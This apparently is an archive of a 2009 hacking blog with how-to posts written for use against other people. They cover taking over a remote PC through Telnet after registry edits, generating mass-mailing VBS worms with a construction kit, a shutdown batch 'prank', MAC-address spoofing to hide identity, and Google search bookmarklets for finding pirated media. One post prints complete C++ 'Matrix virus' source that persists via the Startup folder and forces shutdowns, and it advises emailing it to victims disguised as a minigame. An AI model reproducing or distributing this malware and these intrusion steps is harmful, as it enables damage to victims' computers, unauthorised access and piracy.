Sunday, August 2, 2009

Take control of another computer

Things to need
Remote Pc’s Account Username And Password

<-- Method -->

1. Go tO COmmand Promt(press Windows+R and type cmd)
2. type cd\ (to go to main root Of C:)
3. type the command
c:\net use \\(Rempote PC’s Username i.e Amit)\ipc$ /u:Administrator
c:\net use \\Amit\ipc$ /u:Administrator(press Enter)
(Results of the above Command)
The Password Or Username Is Invalid For \\Amit\ipc$.
Enter The PassWord For “Administrator” tp connect to ‘Amit’:*****
The Command COmpleted Successfuly.
4. Press Window+R Write regedit To Enter RegsitryEditor.
5. Press Alt+F Then C.
6. Write Down The “Object’s Name”.Amit(Computer’s Username)then Press Enter.
(New Computer’s Registry Is Successsfully Accessed).
7. Just GO TO
Amit\HKEY_LOCAL_MACHINE\SFTWARE\Microsoft\Windows\TelnetServer\1.0
On The Right Hand Double Click On The Key Named As “NTLM”(New BOx Appear)
Value Name:NTLM
Value Data:(Replace 2 with 0)
Base :HexaDecimal
Press OK.
Get Out Of registry Editor.
8. Again Press Windows+R And Write mmc.(Consol1 Will Open)
9. Press Alt+F then M(New Windows Will Appear)
10.Press Alt+D Then Double Click On “Computer Management”
11.Select “another Computer” and write its Account Login(Amit).
12.Press Finish And Then Close The “Add StandALone Snap-in”Dialogue Box.
13.Now Press OK Of “Add/Remove Snap-in”.
14.On The Left Hand Expand Computer Management>Select Services And Aplications>Services
15.On The Right Hand Scroll down And Right CLick At “Telnet”And Select Restart Option.
16.Leave It As It is
17.Turn To Command Promt Write
c:\telnet Amit(Press Enter)
it Will Require Login And PassWord
Login:Administrator
PassWord:********(Enter)
*———————————————————–
Welcome TO Microsoft Telnet SErver
C:dir(Enter)


Now you are in your frnd computer....

Saturday, May 2, 2009

Remotely Shutdown Your Computer With Mobilephone


This video will show you how to shutdown your computer from anywhere using a cell phone, Microsoft Outlook and a free account from www.kwiry.com




Friday, May 1, 2009

Google Search Hacking

Well if u ask me this is the best Part " how to Search ",
Anyone anywhere needs something out of the great "www",
now if u know how to grab hold to "something" in one click that is the skill,
this article henceforth is one of my best my best,
n especially crafted to meet all ur needs !!

Songs
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER ARTIST OR SONG NAME:',''))};if(Qr)location.href='http://www.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+mp3+OR+wma+OR+ogg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Ebook
javascript:Qr='';if(!Qr){void(Qr=prompt('Enter Author name OR Book name:',''))};if(Qr)location.href='http://www.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+pdf+OR+rar+OR+zip+OR+lit+OR+djvu+OR+pdb+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Image
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER IMAGE NAME:',''))};if(Qr)location.href='http://www.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+jpg+OR+png+OR+bmp+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
movie
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER MOVIE NAME:',''))};if(Qr)location.href='http://www.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+avi+OR+mov+OR+mpg+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
Application
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER Application NAME:',''))};if(Qr)location.href='http://www.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+exe+OR+rar+OR+zip+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'
game
javascript:Qr='';if(!Qr){void(Qr=prompt('ENTER GAME NAME:',''))};if(Qr)location.href='http://www.google.com/ie?query=%22parent+directory%22+%22'+escape(Qr)+'%22+exe+OR+iso+OR+rar+-html+-htm&num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=active&sa=N'

Just copy from javascript and paste this on u r add bar and enter the details andEnjoy!




Google Operators:


Operators are used to refine the results and to maximize the search value. They are your tools as well as ethical hackers’ weapons.

Basic Operators:
+, -, ~ , ., *, “”, |,

OR

Advanced Operators:
allintext:, allintitle:, allinurl:, bphonebook:, cache:, define:, filetype:, info:, intext:, intitle:, inurl:, link:, phonebook:, related:, rphonebook:, site:, numrange:, daterange

Basic Operators !!



(+) force inclusion of something common

Google ignores common words (where, how, digit, single letters) by default:
Example: StarStar Wars Episode +I

(-) exclude a search term
Example: apple –red

(“) use quotes around a search term to search exact phrases:
Example: “Robert Masse”

Robert masse without “” has the 309,000 results, but “robert masse” only has 927 results. Reduce the 99% irrelevant results

(~) search synonym:
Example: ~food
Return the results about food as well as recipe, nutrition and cooking information.

( . ) a single-character wildcard:
Example: m.trix


Return the results of M@trix, matrix, metrix…….
( * ) any word wildcard

Advanced Operators:

Site: Domain_name
Find Web pages only on the specified domain. If we search a specific site, usually we get the Web structure of the domain

Examples:

site:http://wholovehacking.blogspot.com


Filetype: extension_type

Find documents with specified extensions

The supported extensions are:

- HyperText Markup Language (html) - Microsoft PowerPoint (ppt)
- Adobe Portable Document Format (pdf) - Microsoft Word (doc)
- Adobe PostScript (ps) - Microsoft Works (wks, wps, wdb)
- Lotus 1-2-3 - Microsoft Excel (xls)
(wk1, wk2, wk3, wk4, wk5, wki, wks, wku) - Microsoft Write (wri)
- Lotus WordPro (lwp) - Rich Text Format (rtf)
- MacWrite (mw) - Shockwave Flash (swf)
- Text (ans, txt)


Note: We actually can search asp, php and cgi, pl files as long as it is text-compatible.

Example: Budget filetype: xls


Advanced Operators “Intitle:”

Intitle: search_term

Find search term within the title of a Webpage

Allintitle: search_term1 search_term2 search_term3
Find multiple search terms in the Web pages with the title that includes all these words

These operators are specifically useful to find the directory lists


Example:
Find directory list:
Intitle: Index.of “parent directory”




Advanced Operators “Inurl:”


Inurl: search_term
Find search term in a Web address

Allinurl: search_term1 search_term2 search_term3
Find multiple search terms in a Web address


Examples:
Inurl: cgi-bin
Allinurl: cgi-bin password



Advanced Operators “Intext;”


Intext: search_term
Find search term in the text body of a document.

Allintext: search_term1 search_term2 search_term3
Find multiple search terms in the text body of a document.


Examples:
Intext: Administrator login
Allintext: Administrator login




Advanced Operators: “Cache:”



Cache: URL
Find the old version of Website in Google cache

Sometimes, even the site has already been updated, the old information might be found in cache


Examples:
Cache: http://wholovehacking.blogspot.com


Advanced Operators



..
Conduct a number range search by specifying two numbers, separated by two periods, with no spaces. Be sure to specify a unit of measure or some other indicator of what the number range represents


Examples:
Computer $500..1000
DVD player $250..350


Advanced Operators: “Daterange:”



Daterange: -

Find the Web pages between start date and end date

Note: start_date and end date use the Julian date
The Julian date is calculated by the number of days since January 1, 4713 BC. For example, the Julian date for August 1, 2001 is 2452122


Examples:
2004.07.10=2453196
2004.08.10=2453258


Vulnerabilities date range: 2453196-2453258



Advanced Operators “Link:”



Link: URL
Find the Web pages having a link to the specified URL

Related: URL
Find the Web pages that are “similar” to the specified Web page
info: URL

Present some information that Google has about that Web page
Define: search_term

Provide a definition of the words gathered from various online sources


Examples:
Link: wholovehacking.blogspot.com
Related: wholovehacking.blogspot.com
Info: wholovehacking.blogspot.com

Define: Network security


Advanced Operators “phonebook:”


Phonebook
Search the entire Google phonebook
rphonebook
Search residential listings only
bphonebook
Search business listings only

Thursday, April 23, 2009

Make a Virus With The Help Of "vbswg 2 beta"

Back in the old days, when viruses ware written in assembler, were small enough to hide in the boot sector of a floppy disk, were able to attach themselves to a file without anyone noticing (and files were quite small those days), had stealth capability, and could influence your hardware directly, bypassing the operating system.

So maybe, maybe in those days, creating viruses could be seen as an achievement, or as a sport. Now, any fool can do it. And judging by the number of viruses, a lot of them do.
Here's how.

1. search the web for something like "Virus Construction Tool" or "Internet Worm Generator". Download it.
2. run the program (click on its icon).
3. fill in the form. Choose interesting names.



4. check the boxes to indicate how you want this virus / worm to spread (e-mail, irc, ...)

5. choose your options for 'payload'

click "Done".
6. click "create virus" or "generate"
7. Save the file
8. run it to see if it works.

This should create a visual basic script that will run on Windows computers and try to use the same Outlook application files to mass-mail itself. Much like the 'I love you' virus or the 'Ana Kournikova' worm.

Tuesday, April 14, 2009

Never seen before XP Secrets !!!!!!

Hidden Programs In Windows Xp
1) Private Character Editor
This program is for designing icons and Characters(Alphapet)
Click :start
Then :run
type :EUDCEDIT
.................................................. .................................................. .............................................
2) iExpress

This Program is for converting your files to EXECUTABLE files
Click : start
Then : run
type : iexpress
.................................................. .................................................. .............................................
3)Disk Cleanup
This program used for cleaning harddisk to offer space
Click : start
Then : run
type : cleanmgr

.................................................. .................................................. .............................................
4)Dr Watson
This program Is for repairing problems in Windows
Click : start
Then : run
type : drwtsn32
.................................................. .................................................. .............................................
5)Windows Media Player 5.1
Opens the old media player
Click : start
Then : run
type : mplay32
.................................................. ..................................................





Program ............. CODE

__________ __________
Character Map = charmap
------------------------------------
DirectX diagnosis = dxdiag
------------------------------------
Object Packager = packager
------------------------------------
System Monitor = perfmon
------------------------------------
Program Manager = progman
------------------------------------
Remote Access phone book = rasphone
------------------------------------
Registry Editor = regedt32
------------------------------------
File signature verification tool = sigverif
------------------------------------
Volume Control = sndvol32
------------------------------------
System Configuration Editor = sysedit
------------------------------------
Syskey = syskey
------------------------------------
Microsoft Telnet Client = telnet
------------------------------------

Saturday, March 28, 2009

How to make a Virus (Destroyer) continued.......

Now i'm going to tell you make a Virus.
Make one called matrix.
Now remember this is not the answer to all your revenge needs.
The best way to get revenge is to make a FAKE virus that just scares the crap out of them.
If you want to do something constructive with a virus send it to someone who has written and forwarded one before, to stop them.
Heed my warning, but if you still want to ruin your life with jail, here you go.
Step 1- open notepad.
Step 2- paste this...
// The Matrix Virus
// Created by W3irdo
// Hazuras.com

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
}

then save it as whatever you want as long as you save it to be a .exe
Email it and tell them it's a really cool minigame.
I recommend naming it as the game you say it is.
Hope you don't ruin someone innocent's computer.

Thursday, March 26, 2009

How to make a VIRUS

I'm sure that everyone dreamed just once to make a virus and spread him.I personally dreamed to make a big virus and spread it I recognize.Today I've found that you don't need any advanced skills to make a virus.Anyone can make one with a few simple mouse clicks.Today I'm telling you about a prank virus but if you are interested to know how to make a dangerous virus I'll tell you definitely. It's a promise.......

First of all right click on desktop> new>notepad
then copy and paste given content only :

@echo off
shutdown -s -t 60 -c "You have been hacked!"


You can write in “ ” whatever you want.
Then click on file > save as
Put the name with .bat e.g.: hello.bat
After that double click on that and BOOM
After 60 sec. your PC will be shutdown.
But you can prevent this want to know?
Follow these steps:
Click RUN, type shutdown –a and press Enter.

Good bye…..I’ll show you how to destroy a PC of your rivals.

Wednesday, March 25, 2009

Changing your MAC on Windows XP

There are two ways two change your MAC Address on Windows, the easy way and the hard way. Mostly hacker use this for hiding or changing your indentity. . I'll discuss how to do both of them in this tutorial. 


Easy Way:

The first way to change it is, if your NIC (Network Interface Card) supports cloning your MAC Address. If this is the case then you go to.

Start > Control Panel > Network Connections

Right Click on your NIC card and goto properties. Then click the button labeled Configure. It should bring up another form. Click on the advanced tab. You should see under Property "Locally Administered Address" or "Network Address". Click the radio button next to the text box, and type in your new MAC address. (note you do not use the "-" when you enter your no MAC Address.

To check and see if it worked or not go to

Start > Run > and type in "cmd"

When the terminal comes up issue the command.

ipconfig /all
-----------------------------------------------------------------------------------------------------------------------------------------------

Hard Way:

To change your MAC Address the hard way, you first go to

Start > Run > and type in "cmd"

Once the terminal comes up type in

"net config rdr"

It should bring up alot of things, but what you are worried about is

NetBT_Tcpip_{ The Numbers Between here}

Copy the numbers in between there and write it down somewhere, seeing that you will need them later.

After you are done with that go to

Start > Run > and type in "regedt32"

That should bring up the windows registry. Once the registry is up go to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}

Click on the drop down menu and you should see the sub-categories

0000
0001
0002
and so on.

Click on each one and compare the "NetCfgInstanceId" Key with the number you wrote down earlier. Once you find a match double click on the key "NetworkAddress" and change the value to your new MAC address. Hit ok and reboot your system.